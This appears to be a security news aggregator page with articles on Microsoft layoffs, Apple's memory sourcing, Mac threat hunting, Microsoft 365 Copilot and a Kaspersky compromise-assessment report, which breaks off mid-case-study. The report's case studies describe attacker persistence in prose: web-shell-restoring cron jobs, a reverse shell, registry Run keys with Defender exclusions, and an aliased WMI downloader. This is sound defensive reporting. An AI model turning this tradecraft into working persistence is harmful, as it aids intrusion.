Security-Portal.cz is an internet portal focused on computer security, hacking, anonymity, computer networks, programming, encryption, exploits, and Linux and BSD systems. It runs many interesting services and supports its fans in interesting projects.

Categories

Microsoft plans to lay off several thousand employees

Computerworld.com [Hacking News] - 1 hour 26 min ago

Microsoft is expected to announce a new round of layoffs next week, with several thousand jobs at stake, according to Business Insider. Among others, the company’s sales, consulting, and Xbox divisions will be affected.

The cuts are reported to affect less than 2.5% of Microsoft’s approximately 220,000 employees worldwide, meaning the layoffs will be less extensive than last year’s workforce reductions.

In 2025, Microsoft laid off approximately 15,000 employees in two rounds: 6,000 workers in May, followed by another 9,000 in July.

The company is reportedly rolling out the cost-cutting measures while continuing to boost investments in AI. Microsoft has faced increased pressure from investors regarding how AI will affect the company’s future business model and cost structure.

Earlier this year, the company for the first time in its history offered voluntary retirement buyouts to roughly 8,750 employees, or about 7% of its workforce.

Category: Hacking & Security

Google Disrupts NetNut Residential Proxy Network Spanning 2 Million Home Devices

The Hacker News - 2 hours 10 min ago
Google has significantly degraded NetNut, one of the biggest networks that turns home devices into rented relays for other people's traffic. Working with the FBI, Lumen, and others, Google's Threat Intelligence Group (GTIG) said this week it had reduced the network's pool of usable devices by millions. Google identifies NetNut, also tracked as Popa, as a network spread across home
Swati Khandelwal
Category: Hacking & Security

Ransomware Groups Turn to Citrix Bleed 2, BYOVD, and Supply Chain Credentials

The Hacker News - 2 hours 34 min ago
Threat actors associated with the Anubis ransomware operation have been observed exploiting the Citrix Bleed 2 (CVE-2025-5777) vulnerability to obtain initial access. "Although tactics differ between affiliates, common patterns emerged in tradecraft through use of legitimate Remote Management and Monitoring (RMM) tooling, credential access, and hands-on-keyboard procedures used for lateral
Ravie Lakshmanan
Category: Hacking & Security

Cheap Chinese chips could offer way out of RAM price crisis, Apple suggests

Computerworld.com [Hacking News] - 4 hours 10 min ago

The RAM price crisis is pushing hardware manufacturers to pursue deals with Chinese companies, against the wishes of the US government. Apple is one of those reportedly exploring such deals.

“Apple is in negotiations to purchase chips from Chinese semiconductor makers ChangXin Memory Technologies Inc. (CMTI) and Yangtze Memory Technologies Co. (YMTC) to help reduce the impact of a global memory shortage,” Bloomberg reported. “The companies are on a Pentagon blacklist of Chinese entities believed to support Beijing’s military, and Apple’s effort to buy chips from them has included appeals to Trump administration officials to help soften the political fallout,” it said.

Rumors surrounding Apple talking with CMTI and YMTC have been going on for months, with analyst Ming-Chi Kuo pointing to Apple CEO Tim Cook being “one of the few tech leaders who can still navigate both Washington and Beijing, so this is better handled before he steps down as CEO.”

Beyond the potential political ramifications, any deal would have immediate implications for enterprise IT buyers.

“CIOs should focus on the risk that this strategy could introduce. Will Apple be able to thoroughly assess those chips to completely rule out the possibility of trojan horses, backdoors, and hidden functionality such as dead man switches?” asked Flavio Villanustre, CISO for the LexisNexis Risk Solutions Group. “If Apple says that they will do, to what degree of certainty? There have been rumors about hidden backdoors in chips before, such as Supermicro in 2018, ESP32 microcontroller hidden functionality in 2025, and Microsemi backdoor in 2012, to name a few.”

On the naughty list?

This issue gets complicated based on what the US government ultimately does. The two Chinese manufacturers figure on the Pentagon’s so-called 1260H list of “entities identified as Chinese Military Companies,” which also includes Chinese internet giants Alibaba, Baidu, and Tencent; router maker TP-Link Technologies; and drone maker DJI. Being on that list has no real consequences for the companies concerned, but the government could move them to the Department of Commerce’s Entity List, subjecting them to export licensing requirements, or make them the subject of a Section 889 clause, barring them from government procurement deals. That could sharply change the dynamics for Apple and other technology vendors seeking cheaper RAM supplies — and for their customers.

Noah Kenney, principal consultant for Digital 520, said, “Currently, CXMT is only on the Pentagon’s 1260H list, which doesn’t legally bar transactions. Inclusion in the Commerce Department Entity List placement would, which is what Apple is seeking to prevent here.”

He suggested Apple might try to limit blowback by only using the Chinese chips in Apple devices sold in China.

If the government does intensify restrictions and if components from YMTC or CXMT “show up in a customer contract you already signed, a standard-issue device becomes a procurement compliance question. Fleet inventory in MDM will need to track memory sourcing, not just device model. That is a capability most enterprises do not have today,” Kenney said. “The real question for a CIO is not whether Washington pushes back on Apple, but whether their customers will push back for shipping Apple.”

Other vendors use Chinese RAM already

“Lenovo has sourced from Chinese memory makers for years,” as have other manufacturers, Kenney said. “The difference is that they are not lobbying the Treasury Secretary about it.”

Geopolitical analyst Irina Tsukerman said Apple could clear the way for more vendors to use cheaper RAM.

“If Apple absorbs the political criticism and keeps enterprise buyers comfortable, competitors would gain room to consider Chinese memory for selected markets or less sensitive product channels,” Tsukerman said. “If Washington turns Apple into an example, other manufacturers would become more careful around government-facing sales and reserve this kind of sourcing for places where US procurement pressure has less impact.”

Tsukerman agreed with Kenney that IT departments will need to improve component visibility.

“Enterprise CIOs should take this seriously because Apple’s reported sourcing discussions turn a normally invisible component decision into something that can affect procurement credibility, especially for buyers whose technology choices are reviewed through government or regulated-sector requirements,” Tsukerman said.

The lack of a clear product quality issue is what will make this a delicate IT dance, Tsukerman said.

“Engineers could see limited practical danger from memory sourcing alone, and procurement reviewers could still see a serious issue because the supplier has already been placed in a national-security category,” she said.

This article first appeared on Network World.

Category: Hacking & Security

Jamf exec: The exploit isn’t what gives attackers away

Computerworld.com [Hacking News] - 5 hours 2 sec ago

Jamf this week unveiled Beacon, a threat-hunting service that aims to provide dedicated, proactive detection and analysis of Mac threats. The new security tool relies on Jamf’s Mac telemetry, which equips Jamf Threat Labs with the kind of deep visibility it needs to hunt for Apple-specific attacks, anomalous activity and suspicious behaviors. 

Security is always a major issue, but the threat environment is only becoming more complex, with AI adding a whole new set of dangers to fear. The unique nature of the Mac creates a paradox: while more employees want to use Macs, organizations sometimes lack the relevant internal expertise to support and secure them. Even with the correct endpoint security tools and policies in place, blue teaming can be under-resourced. As a result, organizations struggle to start, scale, repeat, and measure effective Mac threat-hunting programs.

Even the smallest business needs security protection at quite a high level — but who can afford a whole threat detection and remediation team?

With that in mind, Jaron Bradley, director of Jamf Threat Labs, offered more details about the company’s newly-introduced security service and broader security issues affecting Mac fleets in the business world.

AI is boosting attackers, what is the current environment, and why is awareness becoming more essential? “AI is primarily changing the speed at which attackers operate. We’re seeing this across the board: malicious websites go live faster, malware gets built faster, and malware adapts faster once it’s detected in the wild. That said, AI isn’t only benefiting attackers; defenders have gained just as many new capabilities from it. The bigger question is who can use it better.

“AI has effectively lowered the skill floor, so someone who would have once been dismissed as a ‘script kiddie’ can now build functional malware or ransomware with far less expertise than before. That’s why awareness matters more now: the pool of capable attackers is growing even faster.”

Is perimeter security a realistic ambition anymore? “This may depend on the company and its office requirements, but many would argue that security shifted from the perimeter to the endpoint long ago. That doesn’t mean perimeter security is dead; it simply means it’s one layer in a broader defense strategy. Many security analysts have found detection and analysis of novel threats to be more achievable at the endpoint level.”

If AI identifies a vulnerability and moves to exploit it, how likely is Beacon to identify the attack taking place? “AI has certainly changed the threat landscape, especially around vulnerability discovery and exploit development. The good news for expert threat hunting is that this doesn’t have a large effect on our ability to detect attacks.

“Zero-days have always existed, and while AI raises the stakes by accelerating how quickly they’re found and weaponized, it’s usually the activity attackers perform after using an exploit, not the exploit itself, that gives them away. No defense is ever truly complete, so the real differentiator has always been how fast and how well you notice when something’s wrong. That’s exactly where Beacon is built to add value: expert knowledge of what this malicious activity looks like in the Apple environment.”

Q: What sort of threats are you seeing right now? “Infostealer malware remains the single biggest threat to macOS right now. These stealers trick users into running them through convincing fake websites and social engineering, then exfiltrate as many credentials and secrets as possible for the attacker to use, sell, or trade on the dark web. 

“Apple regularly ships new protections, and attackers just as regularly adapt their social engineering to stay ahead of them. Techniques like ClickFix, where users are tricked into pasting and running malicious commands themselves, have become especially effective because they bypass many protections entirely by getting the user to do the work. Beyond that, supply chain attacks are growing at an alarming rate, with attackers compromising developer libraries that get pulled into internal or production projects, quietly introducing backdoors without the creator’s knowledge.”

Q: What about the manufacturing sector? Is there any excuse to use legacy kit at all in an AI threat age? “AI generated threats won’t necessarily be different than traditional ones, but they will stress the seams of traditional security programs that will need to have improved visibility at scale and be able to work at a new kind of speed and agility from start to finish.”

Q: Should IT delay security releases at all anymore? “It’s difficult to find a one-size-fits-all answer here. Delaying a release makes sense when the risk of shipping outweighs the cost of waiting, and that calculation looks very different for a hospital system than it does for a consumer app. The more meaningful shift in recent years isn’t about delaying more or less; it’s about catching problems earlier, so delaying becomes the exception rather than the standard. Both rushing and waiting carry real risks, so the decision should weigh multiple factors, particularly when security updates are on the line.”

Category: Hacking & Security

Trojanized GitHub PoC Repositories Deliver ChocoPoC Malware to Security Researchers

LinuxSecurity.com - 5 hours 17 min ago
GitHub has become the latest delivery mechanism for malware aimed at security researchers.
Category: Hacking & Security

ThreatsDay: AI Compute Hijacking, Apple Email Flaw, BlueHammer Ransomware + 14 Stories

The Hacker News - 5 hours 40 min ago
This week’s security news is mostly about weak spots. Browsers, bots, sandboxes, AI systems, and email flows all show the same problem in different ways. Everything looks normal until someone tests a small gap and finds a way through. This is not one big break. It is small permissions, weak checks, open systems, and normal tools doing things they were allowed to do. That same pattern runs
Ravie Lakshmanan
Category: Hacking & Security

Google loses final appeal to overturn €4.1 billion EU fine

Bleeping Computer - 5 hours 46 min ago
Court of Justice of the European Union (CJEU) has dismissed Google's final appeal against a €4.1 billion ($4.7 billion) antitrust fine over the company's use of Android to promote its Chrome browser and search service. [...]
Category: Hacking & Security

ConsentFix and ClickFix: How Microsoft 365 Accounts are Hijacked in 3 Seconds

Bleeping Computer - 7 hours 4 min ago
ConsentFix and ClickFix attacks steal Microsoft 365 tokens in seconds using fake prompts and OAuth flows. Learn how these MFA bypass tactics work and how to defend against them. [...]
Category: Hacking & Security

ToddyCat-Linked Umbrij Malware Abuses OAuth to Access Gmail via Google API

The Hacker News - 8 hours 52 sec ago
The threat actor known as ToddyCat has been attributed to a new malware called Umbrij that's designed to gain surreptitious access to a victim's email correspondence via the Google API. "In this campaign, the attackers focused their attention on corporate email communications hosted on Gmail, targeting access compromise via APIs," Kaspersky said in a detailed report published this week. "
Ravie Lakshmanan
Category: Hacking & Security

Microsoft fixes bug that removed Copilot buttons in Outlook

Bleeping Computer - 8 hours 49 min ago
Microsoft has fixed a known issue causing the Copilot Chat or Copilot buttons in Classic Outlook to disappear for Windows users with the Copilot Chat (Basic) license. [...]
Category: Hacking & Security

Cisco finally confirms attackers exploiting Unified CM flaw

Bleeping Computer - 9 hours 29 min ago
Cisco confirmed that attackers are now exploiting a Unified Communications Manager (Unified CM) vulnerability patched in early June. [...]
Category: Hacking & Security

Identity Lifecycle Management Wasn't Built for AI Agents

The Hacker News - 9 hours 35 min ago
Identity lifecycle management was architected around a person with an employment record, a manager, and a departure date. AI agents have none of those. As autonomous principals proliferate across enterprise environments, the governance model built for humans develops structural blind spots that traditional IGA tools weren't designed to detect. This guide covers where that model breaks, what it
Category: Hacking & Security

Microsoft 365 Copilot: Office meets genAI and agents

Computerworld.com [Hacking News] - 10 hours 5 min ago

First launched in November 2023, Microsoft 365 Copilot brings a range of generative AI (genAI) features to Microsoft Office productivity apps, such as Word, Outlook, Teams, and Excel. With capabilities ranging from quick meeting summaries to in-depth data analysis, it’s available via a paid add-on license for Microsoft 365 enterprise and small-business customers.

Initially hampered by underwhelming capabilities and a hefty price tag for businesses of all sizes, M365 Copilot has slowly gained traction in business as its abilities have increased and the integrations between Copilot and various M365 apps and services have improved. With numerous feature rollouts over the past three years, Microsoft has gradually repositioned M365 Copilot from a simple chatbot to a collection of autonomous agents that can carry out tasks across the M365 ecosystem.

The company has also goosed adoption by introducing a more affordable pricing tier for small businesses and (temporarily, as it turns out) allowing commercial users with a standard M365 license to use Copilot in the Office apps, even without the add-on M365 Copilot license.

Microsoft 365 Copilot pricing: 2026 tiers

| Tier | Monthly cost (paid annually) | Availability |
| --- | --- | --- |
| M365 Copilot | $30 / user | For organizations with more than 300 seats; required for in-app Copilot integration in organizations with more than 2,000 seats |
| M365 Copilot Business | $21 / user | For organizations with 10 – 300 seats |
| Agent 365 (add-on management layer) | $15 / user | Available as standalone subscription or included in the new M365 E7 Frontier Suite |

Microsoft 365 Copilot today

In this way, Microsoft 365 Copilot has moved from genAI curiosity to a key part of many enterprises’ workflows. In January 2026, Microsoft said it had 15 million paid M365 Copilot seats, a figure the company raised to 20 million in April.

However, its momentum now faces a challenge as Microsoft limits access to Copilot Chat, a freemium version of the paid M365 Copilot, for its largest enterprise customers.

Specifically, for commercial customers with more than 2,000 seats, Microsoft has removed in-app Copilot Chat access from Word, Excel, and PowerPoint for users without a Microsoft 365 Copilot license. To maintain that integration, large organizations must now pay for the full $30/user/month M365 Copilot license. The M365 Copilot license includes what Microsoft calls priority access to Copilot capabilities, which provides “faster response times and more consistent availability compared to standard access,” according to the company.

Smaller firms (less than 2,000 seats) that have a Microsoft 365 license but not the add-on M365 Copilot license will maintain standard access to Copilot from within the Office apps. Microsoft warns that standard users may experience longer response times and temporary feature limitations as the service shifts resources to its higher-tier customers during peak hours.

When signed in to the Copilot Chat hub, users can see which version of Copilot they have by looking for one of the following labels at the bottom of the left sidebar:

  • Copilot Chat (Basic) means the user doesn’t have an M365 Copilot license and can’t use Copilot in the Office apps. They can use the standalone Copilot Chat app with standard access.
  • M365 Copilot (Basic) means the user doesn’t have an M365 Copilot license but does have standard access to Copilot in the Office apps.
  • M365 Copilot (Premium) means the user has an M365 Copilot license and has priority access to Copilot in the Office apps.

Users with paid M365 Copilot licenses also get advanced features including the ability to pull in data from across the M365 environment (documents, meetings, emails, chats, etc.), extensive use of agents including “advanced” agents like Researcher and Analyst, and the ability to create custom agents. See Microsoft’s “How Copilot Chat works with and without a Microsoft 365 Copilot license” page for details.

What’s new with Microsoft 365 Copilot
  • Licensing shift: Large enterprises (more than 2,000 seats) cannot access Copilot directly in Office apps without the M365 Copilot license.
  • Multimodel access: M365 Copilot now supports non-OpenAI models like Anthropic’s Claude 4, allowing users to choose the best logic for specific tasks.
  • Agentic pivot: The focus shifts from simple chat to autonomous agents that execute multi-step workflows across the M365 ecosystem.

What other Copilots does Microsoft offer?

    It’s worth noting that Microsoft uses the term “Copilot” for a wide variety of genAI tools and functions. Individual users with M365 Personal, Family, and Premium subscriptions can use Copilot in Office apps, but with fewer features and privileges than business users get with a Microsoft 365 Copilot license. There’s also a free consumer version of Copilot with very limited functionality.

    Adding to the confusion, the company offers several specialized enterprise versions of Copilot for specific purposes, including Microsoft Copilot Studio, Microsoft Security Copilot, Azure Copilot, and GitHub Copilot, as well as additional Copilot “experiences” for Microsoft products such as Dynamics 365, Power Platform, and Microsoft Fabric.

    Also available: agents in M365 Copilot built for specific industries, including finance, sales, and service.

    From chatbot to multi-model researcher to agentic powerhouse

    Microsoft has moved away from a single-model approach for its AI assistant. Copilot Chat has evolved into a Frontier interface, allowing users to select among different LLMs (large language models) such as GPT-5.4 and Anthropic Claude 4 for specialized tasks.

    A persistent AI risk for enterprises is overly permissive data access. Because Copilot inherits the permissions of the user, any file that is improperly shared within an organization can be surfaced by the AI. To combat the issue of business-critical files that are at risk due to inappropriate classification, Microsoft has integrated Purview Data Security Posture Management (DSPM) more deeply into Copilot, alerting users when they are generating content from unclassified or sensitive sources.

    Other recently introduced M365 Copilot features include:

    • Copilot Researcher: This feature allows the assistant to pull from multi-model intelligence, comparing perspectives from different AI models side-by-side to reduce hallucinations.
    • Copilot Notebooks: Notebooks allow you to ground the AI in specific project context. These can now be exported directly into structured Excel spreadsheets or PowerPoint decks, bypassing the need for manual copy and pasting.
    • Teams Interpreter: Integrated directly into Teams Phone, Interpreter is designed to provide real-time, AI-powered language interpretation during live calls, a boon for global enterprise operations.
    • App Builder: A no-code tool that lets business users create apps, workflows, and agents using natural language prompts. It’s essentially a “lite” version of Microsoft’s high-end Copilot Studio environment for developers.
    • Agents for Word, Excel, and PowerPoint: Advanced modes that allow Copilot to take direct action on documents and files rather than simply suggest changes.

    Even more notable was the June launch of Copilot Cowork, which Microsoft pitches as an AI agent for M365 Copilot that can independently perform long-running, multi-step tasks, even when a user’s computer is turned off. Unlike Anthropic’s Claude Cowork, which can interact directly with files and applications on a user’s computer, Copilot Cowork runs in Microsoft’s cloud environment and acts on documents held in a customer’s Microsoft 365 tenant. Copilot Cowork requires a Microsoft 365 Copilot license and is billed based on usage.

    Another announcement that caused a stir was Microsoft’s unveiling of Scout, its first autonomous agent built on the open-source OpenClaw platform. By integrating OpenClaw-style agentic capabilities, Microsoft hopes to transform Copilot into an always-on system that can, for instance, scan Outlook email inboxes and calendars to suggest daily priorities. Microsoft’s implementation addresses security concerns around self-hosted agents by isolating professional-grade “autopilots” within specific roles and applying managed permission guardrails. Scout is available as an “experimental release” to customers of Microsoft’s Frontier program.

    Industry analysts note that these tools are new and unproven, and IT leaders should use caution when testing them and evaluating costs.

    Managing AI agent sprawl: Enter Agent 365

    As organizations move beyond simple chat to building custom declarative agents in Copilot Studio, the risk of shadow AI has become a concern. Gartner reports that 86% of IT leaders require additional governance to manage these agents.

    Available as an add-on subscription for Microsoft 365 or bundled in the top-end M365 E7 package, Agent 365 acts as a control plane for the AI ecosystem. Unlike the user-facing Copilot, Agent 365 is a back-end dashboard that allows IT admins to manage agents in various ways:

    1. Registry and lifecycle management: View every agent — Microsoft, third-party, or internally developed — in a “single-pane-of-glass” dashboard.
    2. Policy-based guardrails: Admins can set global rules to prevent agents from accessing high-sensitivity data (like payroll), even if the human user has permission.
    3. Unified ROI analytics: Leaders can track which agents are actually driving value, allowing for precise seat-count adjustments during renewal cycles.

    Microsoft Agent 365 quick facts

    • Pricing: $15 / user / month (as an add-on) or included in the Microsoft 365 E7 suite ($99 / user / month)
    • Core functions: Centralized registry, access control, and performance analytics for all AI agents
    • Objective: Designed to prevent agent sprawl and ensure agents from partners (e.g., Adobe, ServiceNow, etc.) follow M365 security rules

    Gartner says that Agent 365 is still a work in progress and has yet to prove it can actually reduce costs in IT operations. The analyst firm advises customers to assess Agent 365 but not necessarily move to it or the E7 bundle right away.

    Copilot vs. AI in other productivity apps

    Most vendors in the productivity and collaboration software market have added genAI and agentic tools to their offerings at this point.

    The rivalry between Microsoft and Google has heightened in 2026. While Google has faced criticism for a messy transition from the Google Assistant to Gemini, it remains a price leader by embedding Gemini features directly into most tiers of its office suite, Google Workspace.

    In contrast, Microsoft seems to be threading a needle, tightening Copilot Premium licensing for large enterprises while making basic Copilot features available to smaller customers without an add-on license. The goal may be to standardize AI as a commodity while reserving the high-value agentic features for the highest-paying enterprise customers.

    While Microsoft focuses on the productivity suite, Salesforce is positioning Slack as the “agentic operating system” for the enterprise. As of April 2026, Slack AI has moved beyond summarizing to orchestrating agentic workflows. This is designed to let you trigger complex, multi-step actions across non-Microsoft systems directly from a Slack thread.

    Salesforce’s Agentforce platform uses the Atlas Reasoning Engine, which is designed to offer autonomous front-office automation (sales, service, and marketing). For organizations where CRM data is more critical than Word documents, Agentforce is emerging as a formidable, high-ROI alternative to Copilot.

    Gartner’s 5 stages of agentic AI evolution

    Gartner projects that agentic AI could drive approximately 30% of enterprise application software revenue by 2035. The analyst firm’s roadmap identifies five maturity stages for IT leaders:

  • 2025: AI assistants: Embedded helpers that simplify tasks but remain dependent on human input
  • 2026: Task-specific agents: Agents capable of end-to-end complex tasks, such as real-time cybersecurity-threat response
  • 2027: Collaborative agents: Multi-agent systems that work together across data environments to solve multifaceted business problems
  • 2028: Agentic front ends: A shift where a third of user experiences move away from native apps toward “agentic interfaces” that navigate multiple apps on behalf of the user
  • 2029: Democratized ecosystems: A new normal where 50% of knowledge workers actively govern or create agents on demand for complex tasks

    In March 2026, Apple launched Apple Business, a platform designed to integrate Apple Intelligence directly into macOS and iOS. Apple claims its competitive edge is its on-screen awareness. Unlike cloud-heavy competitors, Apple Intelligence is built to act across apps locally, appealing to regulated industries concerned about data leakage.

    Apple Business now supports automated Managed Apple Accounts via integration with Microsoft Entra ID, a feature designed to let IT teams manage Apple’s AI features using their Microsoft identity stack.

    As Microsoft tightens the reins on free access, the question for enterprise IT leaders is no longer whether Copilot can summarize a meeting, but whether the $30-per-month leap delivers enough agentic automation to justify the cost. For many, the answer will lie in the effectiveness of Agent 365 in bringing order to the burgeoning fleet of AI workers.

    This article was originally published in February 2025 and most recently updated in July 2026.

    Category: Hacking & Security

    CISA: Microsoft SharePoint RCE flaw now actively exploited

    Bleeping Computer - 10 hours 12 min ago
    CISA warned on Wednesday that attackers have begun exploiting a high-severity Microsoft SharePoint remote code execution vulnerability patched in May. [...]
    Category: Hacking & Security

    Opera rolls out Paste Protect feature to fight ClickFix attacks

    Bleeping Computer - 10 hours 18 min ago
    Opera has introduced Paste Protect, a security feature designed to block ClickFix-style attacks that trick users into executing malicious commands through social engineering. [...]
    Category: Hacking & Security

    AI Agent Exploits Langflow RCE to Automate Database Ransomware Attack

    The Hacker News - 11 hours 1 min ago
    Security firm Sysdig says it has found what it believes is the first ransomware attack run from start to finish by an AI agent. Its Threat Research Team calls the operator JADEPUFFER and says a large language model handled the whole job: breaking in, stealing credentials, moving deeper into the network, then encrypting and wiping a company's production database. Ransomware has always
    Swati Khandelwal
    Category: Hacking & Security

    Missed incidents, persistent threats, and response gaps: Insights from compromise assessment projects

    Kaspersky Securelist - 12 hours 4 min ago

    The following analysis presents the key findings from Kaspersky Compromise Assessment engagements performed in 2025. A compromise assessment is an independent, expert-driven service that examines whether a target network has been compromised. The service combines threat intelligence analysis (including darknet sources), tool-aided endpoint scanning, a systematic review of security event logs and network traffic, and, when necessary, an initial incident response and digital forensic investigation.

    This report focuses on missed incidents – threats that remained undetected for weeks, months, or even years.

    Key trends observed during compromise assessment engagements
    • Proactive compromise assessment decreases the number of missed high-severity incidents. The highest proportions of high-severity incidents were revealed in organizations that requested our compromise assessment service after containing a known incident. The lowest proportions of high-severity incidents were observed in organizations that conducted regular audits. Of all the incidents discovered, 20% were found manually, while enterprises missed 60% because of the absence of high-confidence alerts from the tools in place.
    • Nearly a third of discovered incidents took over three months to detect. The longer a threat persisted in the target environment, the greater the likelihood that an incident would be severe. 30.8% of all discovered incidents and 52% of high-severity compromises had historical activity spanning over three months. The oldest incident discovered in 2025 had gone undetected for four years.
    • Malicious files often remain in backups and are restored after incident response activities. 40% of all discovered web shells resided in backups and went unnoticed until a proper compromise assessment was conducted.
    • Threat actors rely on remote management tools and LoLBins. These types of tools were found in all compromise assessment engagements that resulted in an incident detection.
    • Monitoring tools and controls are not self-sufficient; operational maturity makes the difference. Monitoring tools must be configured and adapted to the changing threat landscape. Furthermore, human analysts need to review low-confidence alerts. A lack of continuous monitoring and threat hunting activities increased the likelihood of high- and medium-severity incidents to 84–86%. At the same time, high‑severity incidents were rare among organizations with in-house capabilities to reverse-engineer malware.
    • Communication issues lead to missed incidents. Nearly a third of the compromise assessments revealed communication issues that impacted incident response activities.
    • The incident response playbook is not set in stone. For incident response to be efficient and effective, playbooks must be updated as new artifacts are discovered. Treating the incident response plan as a living document reduces the risk of missing threats.

    About the Kaspersky Compromise Assessment service

    Our global compromise assessment portfolio spans several regions. In 2025, around 71% of the incidents we identified affected our customers in the META region, while the APAC and CIS regions accounted for the remaining 29%.

    Geographic distribution of incidents identified during Kaspersky Compromise Assessment projects in 2025

    Our service was requested by organizations from a diverse set of sectors. The government sector accounted for around 29% of incidents, followed by the education (19%) and financial (17%) sectors.

    Distribution of economy sector incidents identified during Kaspersky Compromise Assessment projects in 2025

    Detection logic families

    Our compromise assessments operate on a continuously updated catalogue of indicators of attack (IoAs). Because the raw set of IoAs is too granular for high-level reporting, we map them to a concise set of detection logic families. The statistics indicate that three detection families dominate the incident mix:

    • Credentials from dumps: 12.4% of all incidents;
    • Specific living-off-the-land (LOTL) tools: 11.2%;
    • Specific malware families: 11.2%.

    These three detection logic families represent high-fidelity indicators of attack that reliably signal infrastructure compromises ranging from dormant, disk-based malware to persistent and multi-stage attacks.

    Distribution of detection logic families

    Reasons for requesting Kaspersky Compromise Assessment services

    Analysis of our compromise assessment engagements that took place in 2025 reveals a clear correlation between the stated purpose of the engagement and the risk profile of the findings. General audits dominate the portfolio with 56% of requests, followed by authority reporting engagements (19%), post-incident checkups (17%), and acquisitions (9%).

    Statistics on the reasons behind CA project requests

    When the findings are classified by severity, the post-incident checkup category exhibits the highest proportion of high-severity incidents (40.7%). The full breakdown is shown below.

    Incident severity breakdown by service engagement reason

    | Reason for service                     | High (%) | Medium (%) | Low (%) |
    |----------------------------------------|----------|------------|---------|
    | Acquiring new company                  | 28.6     | 42.8       | 28.6    |
    | General audit                          | 27.7     | 36.7       | 35.6    |
    | Report to an authority                 | 30       | 46.7       | 23.3    |
    | Checkup after a cybersecurity incident | 40.7     | 25.9       | 33.4    |

    Post-incident checkups are frequently initiated after an initial incident response (IR) effort. The elevated share of high-severity findings suggests that IR activities, which are typically limited to containing a known incident, do not provide a complete view of the broader environment. Consequently, other threats may remain undetected until a full compromise assessment is performed.

    Merger and acquisition-related assessments are proactive assessments performed when a company acquires another entity. The target’s network is scanned for hidden threats before the two environments are merged. These assessments demonstrate a balanced distribution of severity: 28.6% low-severity, 42.8% medium-severity, and 28.6% high-severity. This reflects the mixed risk posture of acquisition targets, which are often evaluated for both known vulnerabilities and hidden malicious activity. Similarly, other proactive approaches, such as general audit assessments or assessments driven by the need to regularly submit a compliance report to a regulatory authority, show almost the same ratio. This indicates that regular, proactive and compliance-oriented assessments tend to reveal substantive issues earlier in the attack lifecycle, reducing the likelihood that they will evolve into high-severity incidents.

    Organizations that conduct regular audits have the highest rate of low-severity findings (36%) and the lowest rate of high-severity issues (28%). We can assume with medium confidence that continuous, proactive compromise assessments are more effective at limiting the emergence of high-severity compromises than reactive, incident-driven evaluations. The data collected in 2025 are consistent with this hypothesis. Integrating regular, third-party compromise assessments into governance processes can therefore reduce the probability of unexpected high-severity findings and improve overall risk posture.

    The following case study illustrates the impact of relying on a reactive rather than proactive approach. It describes a persistent threat that remained dormant on a client’s network and was only discovered after a comprehensive compromise assessment was performed following initial IR activity.

    Case study: Dormant threat uncovered only by a compromise assessment

    A midsize enterprise suffered a high-severity intrusion that was contained and remediated by the IR team within the defined scope of the initial alert. Following containment, the organization requested a check to determine if any additional footholds existed elsewhere in the network. To address this need, the organization engaged Kaspersky’s Compromise Assessment (CA) service, which performed a full forensic review of the environment beyond the scope of the initial incident.

    Compromise assessment experts collected forensic metadata, historical security event logs, and Active Directory configuration data from the entire infrastructure. Threat hunting queries were executed against the aggregated telemetry, focusing on persistence mechanisms, lateral movement artifacts, and anomalous process activity. As a result, a number of severe threats were detected and reported; for example, malicious persistence:

    1. A cron job that recreates a web shell
      A critical Linux system (web server) had a cron job that automatically fetched a copy of a PHP web shell from a public GitHub repository and placed it in an online directory. Even if the file was removed by security personnel, the cron job would simply download it again, giving the attacker a persistent remote code execution point on the web server.
    2. A live reverse shell
      On a server hosting a published web application, the process list showed a bash reverse shell. It was run by a user with the username “apache,” which was the account used to run the web application. This may indicate that the attacker exploited a vulnerability in the web application to gain remote code execution, allowing them to establish a reliable command and control channel that bypassed the firewall because it was initiated from inside the network.
    3. ClipBanker data stealer persisting via Windows registry
      A ClipBanker variant was detected on a user’s workstation machine maintaining persistence by adding itself to the registry key HKU\S-1-5-21-[REDACTED]-500\Software\Microsoft\Windows\CurrentVersion\Run\9Er6IIp.

      This was done after adding the malware’s folder to Windows Defender exclusions and applying hidden and system attributes to the file to hide it from regular users.
    4. Malicious WMI event consumer with deceptive alias
      A malicious WMI event consumer was detected that downloads and executes a PowerShell script. It created the alias “Kaspersky” for “Invoke-Expression” in an attempt to blend in as legitimate activity in the hope that a quick glance at the script would not raise suspicion. Kaspersky’s Cyber Threat Intelligence confirmed that the downloaded script (no longer reachable) was a weaponized payload used to spread the infection further.

    The IR containment was rapid, focused and effective in addressing the specific incident that triggered the alert. However, the broad-scope compromise assessment revealed multiple backdoors across the environment, each using a different persistence technique: cron jobs, scheduled registry runs, and WMI subscriptions. The infected hosts were outside the original IR scope, so they remained unseen until a comprehensive hunt was conducted.

    Incident response excels at stopping the bleeding and ensuring business continuity after a known incident. A compromise assessment provides a health check that determines whether any other wounds exist. By pairing timely IR with regular, full network compromise assessments, the organization had both the reactive agility to contain incidents and the proactive visibility to eradicate malicious persistence wherever it was hiding. The investigation uncovered additional undetected footholds, providing a clearer view of the environment and reducing the likelihood of a repeat incident.

    Missed long-term incidents

    The statistics on the mean time to detect (MTTD) incidents identified during compromise assessment projects are concerning. Many incidents go unnoticed for extended periods. For example, in 2025 we identified an incident that was approximately four years old!

    Such prolonged detection times can lead to severe consequences, as 30.8% of incidents have historical activity spanning over three months. These incidents can range from dormant malware to persistent threats, highlighting the need for robust detection and response mechanisms.

    Severity distribution of incidents by MTTD

    The relationship between detection latency and incident severity was analyzed by grouping findings according to their MTTD:

    • For incidents detected within the first month, severity is more or less evenly distributed among the low, medium and high categories.
    • However, as the MTTD increases, the severity of incidents shifts towards higher severity. Notably, a high proportion of incidents that took between 30–60 days to be detected are medium-severity incidents (78.57%), while those detected between 60–90 days are predominantly high-severity (71.43%).
    • Among incidents detected after 90 days, a significant proportion are also high-severity incidents (52%).

    Overall, 52% of high-severity incidents are only identified after 90 days of going undetected. This represents a concrete risk: the longer an incident goes undetected, the higher the probability of severe compromise. Organizations that integrate continuous detection, threat hunting activities, and regular compromise assessments can reduce MTTD, limit threat escalation, and lower their overall risk profile.

    The following case study highlights the importance of timely detection and response to prevent incidents from escalating into high-severity events.

    Case study: Four-year-old crypto mining activity on domain controllers

    In May 2025, our compromise assessment experts identified three domain controllers on a customer network that were infected with malicious files. The files had remained hidden for almost four years. They were created in the C:\Windows\Fonts\Mysql directory, abusing its unique characteristic whereby only font files in this directory are visible to regular users. Files with the names nei.bat, dl1host.exe, bat.bat, cmd.bat, and a spoofed svchost.exe were found there. These files were created in June and July of 2021.

